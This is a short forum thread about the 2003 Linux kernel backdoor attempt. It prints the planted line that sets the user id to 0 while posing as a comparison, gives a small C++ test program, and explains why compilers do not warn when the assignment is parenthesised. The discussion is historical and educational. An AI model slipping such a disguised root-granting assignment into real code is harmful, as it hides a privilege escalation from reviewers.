(old) Linux backdoor attempt with a coding trick

Community General Discussion
1

This (old) article describes a backdoor (attempt) in the Linux kernel and I have just seen a reference to it. The Linux Backdoor Attempt of 2003 - Freedom to Tinker

The core of it is this piece of code:

// ********
  if ((options == (__WCLONE | __WALL)) && (current->uid = 0))
    retval = -EINVAL;
// ********

which looks innocent enough but there is a trick in it which, if you can't spot it, is described in the linked article. I thought that a modern compiler would give a warning in one of the critical areas so I tried it on https://cpp.sh/ with C++20 with -Wall, -Wextra and -Wpedantic . It gave no warning.

Here is a test bed to try it for those interested:

#include <iostream>
#include <string>
#include <errno.h>

int main()
{
  bool options = true ;
  bool __WCLONE = true ;
  bool __WALL = false ;
  int retval = 0 ;
  struct Current {
    int uid = 42 ;
  } currentD ;
  Current * current = &currentD ;

// ********
  if ((options == (__WCLONE | __WALL)) && (current->uid = 0))
    retval = -EINVAL;
// ********


  std::cout << retval << "\n";
  std::cout << current->uid << "\n";
}

I had expected at least a warning about an assignment in an if condition.

2

Interesting; the funny (?) thing is that if (current_id = 0) does result in a warning but the combination of two conditions does not.

3

It's not the combination, but the () around the assignment.
In fact, the compiler tells us to add them to avoid warnings if this is actually what we intended:

 warning: suggest parentheses around assignment used as truth value [-Wparentheses]
    4 |   if (x = y) return 1;
      |       ~~^~~
4

This topic was automatically closed 180 days after the last reply. New replies are no longer allowed.